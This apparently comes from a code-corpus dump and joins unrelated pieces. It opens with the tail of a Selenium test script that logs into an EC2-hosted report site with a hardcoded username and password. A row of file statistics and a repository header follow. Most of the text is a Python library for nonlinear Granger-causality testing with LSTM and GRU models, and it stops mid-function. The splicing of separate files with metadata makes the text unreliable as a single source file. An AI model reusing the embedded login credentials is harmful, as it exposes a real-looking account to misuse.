loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms100057/')
self.driver.implicitly_wait(20)
return 0
def test_impact_analysis_launch(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/report')
self.driver.implicitly_wait(10)
print("impact analysis logged successfully..")
def test_impact_analysis_AI(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/report')
self.driver.implicitly_wait(10)
activity_path = '//a[contains(text(),\'Activity Information\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(activity_path))
loginelement.click()
def test_impact_analysis_socre_by_module(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/report')
self.driver.implicitly_wait(10)
activity_path = '//a[contains(text(),\'Score By Module\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(activity_path))
loginelement.click()
def test_impact_analysis_module_attempted(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/report')
self.driver.implicitly_wait(10)
activity_path = '//a[contains(text(),\'Modules Attempted\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(activity_path))
loginelement.click()
# @classmethod
# def tearDownClass(cls):
# cls.driver.close()
# cls.driver.quit()
# print("Test completed..!!")
if __name__ == "__main__":
# unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output='example_dir'))
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='test_result')) | 58.536817 | 122 | 0.690351 | 3,031 | 24,644 | 5.43418 | 0.056747 | 0.137211 | 0.090766 | 0.098658 | 0.914577 | 0.908749 | 0.908749 | 0.906745 | 0.906745 | 0.906745 | 0 | 0.035751 | 0.164624 | 24,644 | 421 | 123 | 58.536817 | 0.764317 | 0.00775 | 0 | 0.789916 | 0 | 0.089636 | 0.211069 | 0.082382 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056022 | false | 0.12605 | 0.019608 | 0 | 0.123249 | 0.008403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
15ff4b2570ab90fd49ddcebc0bbfe47a2b1041b1 | 131,234 | py | Python | nonlincausality/nonlincausality.py | mrosol/Nonlincausality | 1a46215b575134f11bc9870c32bd523084a4ce81 | [
"MIT"
] | 11 | 2021-02-15T22:51:40.000Z | 2022-03-17T23:10:35.000Z | nonlincausality/nonlincausality.py | mrosol/nonlincausality | 1a46215b575134f11bc9870c32bd523084a4ce81 | [
"MIT"
] | 1 | 2021-12-01T17:43:32.000Z | 2021-12-04T14:38:21.000Z | nonlincausality/nonlincausality.py | mrosol/nonlincausality | 1a46215b575134f11bc9870c32bd523084a4ce81 | [
"MIT"
] | 3 | 2021-08-06T19:11:28.000Z | 2022-02-26T18:24:01.000Z | # -*- coding: utf-8 -*-
"""
@author: MSc. Maciej Rosoł
contact: mrosol5@gmail.com
Version 1.0.3
Update: 15.02.2021
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
import math
import statistics
import keras
from keras import Sequential
from keras.layers import Dense, LSTM, Dropout, GRU, TimeDistributed, Flatten
from statsmodels.tsa.arima.model import ARIMA
import tensorflow as tf
'''
This package contains two types of functions.
The first type is an implementation of a modified Granger causality test based on grangercausalitytests function from statsmodels.tsa.stattools.
As the Granger causality test uses linear regression for prediction, it may not capture more complex, nonlinear causal relations.
The first type of presented functions therefore uses nonlinear forecasting methods (recurrent neural networks or ARIMAX models) for prediction instead of linear regression.
For each tested lag, two models are created. The first one forecasts the present value of X based on n=lag past values of X,
while the second model forecasts the same value based on n=lag past values of both the X and Y time series.
If the prediction error of the second model is statistically significantly smaller than the error of the first model, then Y is said to G-cause X (Y->X).
It is also possible to test conditional causality using those functions.
The functions based on neural networks can test the causality on the given test set.
The first type of function contains: nonlincausalityLSTM(), nonlincausalityGRU(), nonlincausalityNN() and nonlincausalityARIMAX().
The second type of functions measures the change of causality over time.
They use the first-type functions to create the forecasting models.
They calculate the measure of the causality in a given time window 'w1' with a given step 'w2'.
The measure of the change of causality over time is the sigmoid function of the quotient of errors - 2/(1 + exp(-((RMSE_X/RMSE_XY)-1)))-1.
A measure of the causality over the whole signal is also computed, as the logarithm of the quotient of error variances - ln(var(error_X)/var(error_XY)).
Those functions can operate with multiple time series and test causal relations for each pair of signals.
The second type of function contains: nonlincausalitymeasureLSTM(), nonlincausalitymeasureGRU(), nonlincausalitymeasureNN() and nonlincausalitymeasureARIMAX().
'''
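# The two measures described above, written out explicitly. This is a minimal
# reference sketch (the helper names below are illustrative and are not called
# by the test functions): rmse_X/rmse_XY are the root-mean-square errors of
# the X-only and X+Y models, and error_X/error_XY their error arrays.
def _causality_change_measure(rmse_X, rmse_XY):
    # sigmoid of the error quotient: 2/(1 + exp(-((RMSE_X/RMSE_XY) - 1))) - 1
    return 2. / (1. + np.exp(-((rmse_X / rmse_XY) - 1.))) - 1.

def _overall_causality_measure(error_X, error_XY):
    # logarithm of the quotient of error variances: ln(var(error_X)/var(error_XY))
    return np.log(np.var(error_X) / np.var(error_XY))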
#%% LSTM
def nonlincausalityLSTM(x, maxlag, LSTM_layers, LSTM_neurons, run=1, Dense_layers=0, Dense_neurons=[], xtest=[], z=[], ztest=[], add_Dropout=True, Dropout_rate=0.1, epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False):
'''
This function is an implementation of a modified Granger causality test. The classical Granger causality test uses linear autoregression for forecasting.
In this function, forecasting is performed by an LSTM neural network instead.
Used model architecture:
1st LSTM layer -> (Dropout) -> ... -> (1st Dense layer) -> (Dropout) -> Output Dense layer
*() - not obligatory
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series. The second column is the variable, that may cause the variable in the first column.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
LSTM_layers - int, number of LSTM layers in the model.
LSTM_neurons - list, tuple or numpy.ndarray, where the number of elements should be equal to the number of LSTM layers specified in LSTM_layers.
The first LSTM layer has the number of neurons equal to the first element in LSTM_neurons,
the second layer has the number of neurons equal to the second element in LSTM_neurons and so on.
run - int, determines how many times a given neural network architecture will be trained to select the model that has found the best minimum of the cost function
Dense_layers - int, number of Dense layers, besides the last one, which is the output layer.
Dense_neurons - list, tuple or numpy.ndarray, where the number of elements should be equal to the number of Dense layers specified in Dense_layers.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
add_Dropout - boolean, if True, than Dropout layer is added after each LSTM and Dense layer, besides the output layer.
Dropout_rate - float, parameter 'rate' for Dropout layer.
epochs_num - int or list, number of epochs used for fitting the model. If list, then its length should be equal to the number of different learning rates used.
learning_rate - float or list, the learning rate applied during training. If list, then its length should be equal to the length of the epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
Returns
-------
results - dictionary, where the numbers of used lags are the keys. Each key stores a list, which contains test results, models for prediction of X fitted only on X time series,
models for prediction of X fitted on X and Y time series, history of fitting the first model, history of fitting the second model, RSS of models based only on X, RSS of models based on X and Y,
index of the best model based on X, index of the best model based on X and Y, errors from the best model based on X, errors from the best model based on X and Y
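Example
-------
A minimal usage sketch; all hyperparameter values below are illustrative
assumptions, not recommended defaults:

>>> x = np.random.randn(500, 2)
>>> res = nonlincausalityLSTM(x, maxlag=[5], LSTM_layers=1, LSTM_neurons=[16],
...                           run=1, epochs_num=[50], learning_rate=[0.001],
...                           batch_size_num=32, verbose=False, plot=False)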
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] !=2:
raise Exception('x should have 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be a positive integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be greater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking if the number of LSTM layers is correct
if type(LSTM_layers) is not int:
raise TypeError('LSTM_layers should be a positive integer.')
if LSTM_layers<0:
raise ValueError('LSTM_layers should be a positive integer.')
# Checking if the number of LSTM neurons in each layer is correct
if type(LSTM_neurons) is list or type(LSTM_neurons) is np.ndarray or type(LSTM_neurons) is tuple:
for LSTM_n in LSTM_neurons:
if type(LSTM_n) is not int:
raise TypeError('Every element in LSTM_neurons should be a positive integer.')
elif LSTM_n<=0:
raise ValueError('Every element in LSTM_neurons should be a positive integer.')
if len(np.shape(LSTM_neurons)) != 1:
raise Exception('LSTM_neurons should be one dimension array or list.')
elif len(LSTM_neurons) != LSTM_layers:
raise Exception('Number of elements in LSTM_neurons should be equal to value of LSTM_layers.')
else:
raise TypeError('LSTM_neurons should be list or numpy array.')
# Checking if run has correct type and value
if type(run) is not int:
raise TypeError('run should be an integer.')
elif run<=0:
raise ValueError('run should be a positive integer.')
# Checking if the number of Dense layers is correct
if type(Dense_layers) is not int:
raise TypeError('Dense_layers should be a positive integer.')
if Dense_layers<0:
raise ValueError('Dense_layers should be a positive integer.')
# Checking if the number of Dense neurons in each layer is correct
elif type(Dense_neurons) is list or type(Dense_neurons) is np.ndarray or type(Dense_neurons) is tuple:
for Dense_n in Dense_neurons:
if type(Dense_n) is not int:
raise TypeError('Every element in Dense_neurons should be a positive integer.')
elif Dense_layers>0 and Dense_n<=0:
raise ValueError('Every element in Dense_neurons should be a positive integer.')
if len(np.shape(Dense_neurons)) != 1:
raise Exception('Dense_neurons should be one dimension array or list.')
elif len(Dense_neurons) != Dense_layers:
raise Exception('Number of elements in Dense_neurons should be equal to value of Dense_layers.')
else:
raise TypeError('Dense_neurons should be list or numpy array.')
# Checking the test data correctness
isxtest = False
if type(xtest) is np.ndarray:
if np.array(xtest.shape).shape[0] !=2:
raise Exception('xtest has wrong shape.')
elif xtest.shape[1] !=2:
raise Exception('xtest should have 2 columns.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
else:
isxtest = True
elif xtest==[]:
xtest = x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
# Checking if z has correct type and values
if type(z) is np.ndarray:
if np.array(z.shape).shape[0] != 2:
raise Exception('z has wrong shape.')
elif z.shape[0] != x.shape[0]:
raise Exception('z should have the same length as x.')
elif True in np.isnan(z):
raise ValueError('There is some NaN in z.')
elif True in np.isinf(z):
raise ValueError('There is some infinity value in z.')
elif z != []:
raise TypeError('z should be numpy ndarray or [].')
# Checking the z test data correctness
if type(ztest) is np.ndarray:
if ztest.shape[0] != xtest.shape[0]:
raise Exception('ztest should have the same length as xtest.')
elif True in np.isnan(ztest):
raise ValueError('There is some NaN in ztest.')
elif True in np.isinf(ztest):
raise ValueError('There is some infinity value in ztest.')
elif z!=[] and ztest==[] and isxtest==False:
ztest=z
elif z!=[] and ztest==[] and isxtest==True:
raise Exception('ztest should be set if xtest is different than [].')
elif ztest!=[]:
raise TypeError('ztest should be numpy ndarray, or [].')
# Checking if add_Dropout has correct type
if type(add_Dropout) is not bool:
raise TypeError('add_Dropout should be boolean.')
# Checking if Dropout_rate has correct type and value
if type(Dropout_rate) is not float:
raise TypeError('Dropout_rate should be float.')
else:
if Dropout_rate<0.0 or Dropout_rate>=1.0:
raise ValueError('Dropout_rate should be greater than or equal to 0 and less than 1.')
# Checking if epochs_num has correct type and value
if type(epochs_num) is not int and type(epochs_num) is not list:
raise TypeError('epochs_num should be a positive integer or list of positive integers.')
elif type(epochs_num) is int:
if epochs_num<=0:
raise ValueError('epochs_num should be a positive integer or list of positive integers.')
else:
epochs_num=[epochs_num]
if type(learning_rate) is list:
raise TypeError('If epochs_num is an int, then learning_rate should also be an int or float, not a list.')
elif type(epochs_num) is list:
for e in epochs_num:
if type(e) is not int:
raise TypeError('epochs_num should be a positive integer or list of positive integers (or both).')
elif e<=0:
raise ValueError('epochs_num should be a positive integer or list of positive integers (or both).')
if type(learning_rate) is not list:
raise TypeError('If epochs_num is a list, then learning_rate also should be a list.')
# Checking if learning_rate has correct type and value
if type(learning_rate) is not int and type(learning_rate) is not float and type(learning_rate) is not list:
raise TypeError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
elif type(learning_rate) is int or type(learning_rate) is float:
if learning_rate<=0:
raise ValueError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
else:
learning_rate=[learning_rate]
elif type(learning_rate) is list:
for lr in learning_rate:
if type(lr) is not int and type(lr) is not float:
raise TypeError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
elif lr<=0:
raise ValueError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
if type(epochs_num) is not list:
raise TypeError('If learning_rate is a list, then epochs_num also should be a list.')
# Checking if batch_size_num has correct type and value
if type(batch_size_num) is not int:
raise TypeError('batch_size_num should be a positive integer.')
elif type(batch_size_num) is int:
if batch_size_num<=0:
raise ValueError('batch_size_num should be a positive integer.')
# Checking if verbose has correct type
if type(verbose) is not bool:
raise TypeError('verbose should be boolean.')
# Checking if plot has correct type
if type(plot) is not bool:
raise TypeError('plot should be boolean.')
# Number of samples in each time series
length = x.shape[0]
testlength = xtest.shape[0]
results = dict()
# Creating LSTM neural network models and testing for causality for every lag specified by maxlag
for lag in lags:
X = x[lag:,0] # signal that will be forecast
Xtest = xtest[lag:,0]
# input data for model based only on X (and z if set)
if len(z)>0:
xz= np.concatenate((z,x[:,0].reshape(x.shape[0],1)),axis=1)
dataX = np.zeros([x.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:,:]=xz[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataX = np.zeros([x.shape[0]-lag,lag]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:]=x[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataX = dataX.reshape(dataX.shape[0],dataX.shape[1],1) # reshaping the data to meet the requirements of the model
# input data for model based on X and Y (and z if set)
if len(z)>0:
xz= np.concatenate((z,x),axis=1)
else:
xz=x
dataXY = np.zeros([xz.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(length-lag):
dataXY[i,:,:] = xz[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
# test data for model based only on X (and z if set)
if len(z)>0:
xztest= np.concatenate((ztest,xtest[:,0].reshape(xtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model only with data from X time series
for i in range(testlength-lag):
dataXtest[i,:,:]=xztest[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for i in range(xtest.shape[0]-lag):
dataXtest[i,:]=xtest[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test data for model based on X and Y (and z if set)
if len(z)>0:
xztest= np.concatenate((ztest,xtest),axis=1)
else:
xztest=xtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model with data from X and Y time series
for i in range(testlength-lag):
dataXYtest[i,:,:] = xztest[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
modelX = {}
modelXY = {}
RSSX = []
RSSXY = []
historyX = {}
historyXY = {}
for r in range(run):
modelX[r] = Sequential() # creating Sequential model, which will use only data from X time series to forecast X.
historyX[r] = []
historyXY[r] = []
if LSTM_layers == 1: # If there is only one LSTM layer, then return_sequences should be False
modelX[r].add(LSTM(LSTM_neurons[0],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # For many LSTM layers return_sequences should be True, to connect the layers with each other
modelX[r].add(LSTM(LSTM_neurons[0],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
for lstml in range(1,LSTM_layers): # adding next LSTM layers
if lstml == LSTM_layers-1: # the last LSTM layer should not return sequences
modelX[r].add(LSTM(LSTM_neurons[lstml],input_shape=(LSTM_neurons[lstml-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # intermediate LSTM layers have to return sequences for stacking
modelX[r].add(LSTM(LSTM_neurons[lstml],input_shape=(LSTM_neurons[lstml-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
for densel in range(Dense_layers): # adding Dense layers if asked
modelX[r].add(Dense(Dense_neurons[densel],activation = 'relu'))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
modelX[r].add(Dense(1,activation = 'linear')) # adding output layer
modelXY[r] = Sequential()# creating Sequential model, which will use data from X and Y time series to forecast X.
if LSTM_layers == 1: # If there is only one LSTM layer, then return_sequences should be False
modelXY[r].add(LSTM(LSTM_neurons[0],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # For many LSTM layers return_sequences should be True, to connect the layers with each other
modelXY[r].add(LSTM(LSTM_neurons[0],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
for lstml in range(1,LSTM_layers): # adding next LSTM layers
if lstml == LSTM_layers-1: # the last LSTM layer should not return sequences
modelXY[r].add(LSTM(LSTM_neurons[lstml],input_shape=(LSTM_neurons[lstml-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # intermediate LSTM layers have to return sequences for stacking
modelXY[r].add(LSTM(LSTM_neurons[lstml],input_shape=(LSTM_neurons[lstml-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
for densel in range(Dense_layers): # adding Dense layers if asked
modelXY[r].add(Dense(Dense_neurons[densel],activation = 'relu'))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
modelXY[r].add(Dense(1,activation = 'linear')) # adding output layer
for i, e in enumerate(epochs_num):
opt = keras.optimizers.Adam(learning_rate=learning_rate[i])
modelX[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyX[r].append(modelX[r].fit(dataX, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
modelXY[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyXY[r].append(modelXY[r].fit(dataXY, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
XpredX = modelX[r].predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = Xtest-XpredX
XYpredX = modelXY[r].predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = Xtest-XYpredX
RSSX.append(sum(errorX**2))
RSSXY.append(sum(errorXY**2))
idx_bestX = RSSX.index(min(RSSX))
idx_bestXY = RSSXY.index(min(RSSXY))
best_modelX = modelX[idx_bestX]
best_modelXY = modelXY[idx_bestXY]
# Testing whether the model including both X and Y has statistically smaller forecast errors
# Wilcoxon signed-rank test (one-sided: |errors of the X-only model| greater than |errors of the X and Y model|)
XpredX = best_modelX.predict(dataXtest)
XpredX = XpredX.reshape(XpredX.size)
XYpredX = best_modelXY.predict(dataXYtest)
XYpredX = XYpredX.reshape(XYpredX.size)
errorX = Xtest-XpredX
errorXY = Xtest-XYpredX
S, p_value = stats.wilcoxon(np.abs(errorX),np.abs(errorXY),alternative='greater')
# Printing the tests results and plotting effects of forecasting
print("Statistics value =", S,"p-value =", p_value)
if plot:
XpredX = best_modelX.predict(dataXtest)
XYpredX = best_modelXY.predict(dataXYtest)
plt.figure(figsize=(10,7))
plt.plot(Xtest)
plt.plot(XpredX)
plt.plot(XYpredX)
plt.legend(['X','Pred. based on X','Pred. based on X and Y'])
plt.xlabel('Number of sample')
plt.ylabel('Predicted value')
plt.title('Lags:'+str(lag))
plt.show()
test_results = {"Wilcoxon test": ([S, p_value],['Statistics value', 'p-value'])}
results[lag] = ([test_results, modelX, modelXY, historyX, historyXY, RSSX,
RSSXY, idx_bestX, idx_bestXY, errorX, errorXY],
['test results','models based on X', 'models based on X and Y',
'history of fitting models based on X', 'history of fitting models based on X and Y',
'RSS of models based only on X', 'RSS of models based on X and Y',
'index of the best model based on X', 'index of the best model based on X and Y',
'errors from the best model based on X','errors from the best model based on X and Y'])
return results
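#%% Usage sketch (LSTM, illustrative)
# A minimal, hedged usage sketch for nonlincausalityLSTM, assuming its signature
# mirrors nonlincausalityGRU below. The helper name _demo_nonlincausalityLSTM,
# the synthetic data and every parameter value are illustrative assumptions,
# not part of the original API. Column 1 (Y) nonlinearly drives column 0 (X),
# so a small p-value is expected at lag 2.
def _demo_nonlincausalityLSTM():
    np.random.seed(0)
    n = 500
    y = np.random.randn(n)
    x_sig = np.zeros(n)
    for t in range(2, n):
        # X depends nonlinearly on its own past and on Y lagged by 2 samples
        x_sig[t] = 0.5*x_sig[t-1] + 0.8*np.tanh(y[t-2]) + 0.1*np.random.randn()
    data = np.vstack([x_sig, y]).T  # shape (n, 2): column 0 = X, column 1 = Y
    res = nonlincausalityLSTM(data[:400], maxlag=[2], LSTM_layers=1, LSTM_neurons=[10],
                              run=1, Dense_layers=1, Dense_neurons=[10],
                              xtest=data[400:], epochs_num=[20], learning_rate=[0.01],
                              batch_size_num=32, verbose=False, plot=False)
    for lag, (values, labels) in res.items():
        print(lag, values[0])  # values[0] holds the Wilcoxon test results
    return res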
#%% GRU
def nonlincausalityGRU(x, maxlag, GRU_layers, GRU_neurons, run=1, Dense_layers=0, Dense_neurons=[], xtest=[], z=[], ztest=[], add_Dropout=True, Dropout_rate=0.1, epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False):
'''
This function is an implementation of a modified Granger causality test. Classical Granger causality uses linear autoregression for testing causality;
in this function the forecasting is made using a GRU neural network.
Used model:
1st GRU layer -> (Dropout) -> ... -> (1st Dense layer) -> (Dropout) -> ... -> output Dense layer
*() - optional
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
GRU_layers - int, number of GRU layers in the model.
GRU_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of GRU layers specified in GRU_layers. The first GRU layer has the number of neurons equal to the first element in GRU_neurons,
the second layer has the number of neurons equal to the second element in GRU_neurons, and so on.
run - int, determines how many times a given neural network architecture will be trained, in order to select the model that has found the best minimum of the cost function.
Dense_layers - int, number of Dense layers, besides the last one, which is the output layer.
Dense_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of Dense layers specified in Dense_layers.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
add_Dropout - boolean, if True, then a Dropout layer is added after each GRU and Dense layer, besides the output layer.
Dropout_rate - float, parameter 'rate' for the Dropout layers.
epochs_num - int or list, number of epochs used for fitting the model. If a list, then its length should be equal to the number of different learning rates used.
learning_rate - float or list, the applied learning rate(s) for the training process. If a list, then its length should be equal to the length of the epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
Returns
-------
results - dictionary keyed by the number of lags used. Each key stores a list, which contains the test results, the models for prediction of X fitted only on the X time series,
the models for prediction of X fitted on the X and Y time series, the histories of fitting the first and the second models, the RSS of models based only on X, the RSS of models based on X and Y,
the index of the best model based on X, the index of the best model based on X and Y, and the errors from the best models based on X and on X and Y.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] !=2:
raise Exception('x should have 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be a positive integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be greater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking if the number of GRU layers is correct
if type(GRU_layers) is not int:
raise TypeError('GRU_layers should be a positive integer.')
if GRU_layers<0:
raise ValueError('GRU_layers should be a positive integer.')
# Checking if the number of GRU neurons in each layer is correct
if type(GRU_neurons) is list or type(GRU_neurons) is np.ndarray or type(GRU_neurons) is tuple:
for GRU_n in GRU_neurons:
if type(GRU_n) is not int:
raise TypeError('Every element in GRU_neurons should be a positive integer.')
elif GRU_n<=0:
raise ValueError('Every element in GRU_neurons should be a positive integer.')
if len(np.shape(GRU_neurons)) != 1:
raise Exception('GRU_neurons should be a one-dimensional array or list.')
elif len(GRU_neurons) != GRU_layers:
raise Exception('Number of elements in GRU_neurons should be equal to value of GRU_layers.')
else:
raise TypeError('GRU_neurons should be a list, tuple or numpy array.')
# Checking if run has correct type and value
if type(run) is not int:
raise TypeError('run should be an integer.')
elif run<=0:
raise ValueError('run should be a positive integer.')
# Checking if z has correct type and values
if type(z) is np.ndarray:
if np.array(z.shape).shape[0] != 2:
raise Exception('z has wrong shape.')
elif z.shape[0] != x.shape[0]:
raise Exception('z should have the same length as x.')
elif True in np.isnan(z):
raise ValueError('There is some NaN in z.')
elif True in np.isinf(z):
raise ValueError('There is some infinity value in z.')
elif z != []:
raise TypeError('z should be numpy ndarray or [].')
# Checking if the number of Dense layers is correct
if type(Dense_layers) is not int:
raise TypeError('Dense_layers should be a positive integer.')
if Dense_layers<0:
raise ValueError('Dense_layers should be a positive integer.')
# Checking if the number of Dense neurons in each layer is correct
elif type(Dense_neurons) is list or type(Dense_neurons) is np.ndarray or type(Dense_neurons) is tuple:
for Dense_n in Dense_neurons:
if type(Dense_n) is not int:
raise TypeError('Every element in Dense_neurons should be a positive integer.')
elif Dense_layers>0 and Dense_n<=0:
raise ValueError('Every element in Dense_neurons should be a positive integer.')
if len(np.shape(Dense_neurons)) != 1:
raise Exception('Dense_neurons should be a one-dimensional array or list.')
elif len(Dense_neurons) != Dense_layers:
raise Exception('Number of elements in Dense_neurons should be equal to value of Dense_layers.')
else:
raise TypeError('Dense_neurons should be a list, tuple or numpy array.')
# Checking the test data correctness
isxtest = False
if type(xtest) is np.ndarray:
if np.array(xtest.shape).shape[0] != 2:
raise Exception('xtest has wrong shape.')
elif xtest.shape[1] !=2:
raise Exception('xtest should have 2 columns.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
else:
isxtest = True
elif xtest==[]:
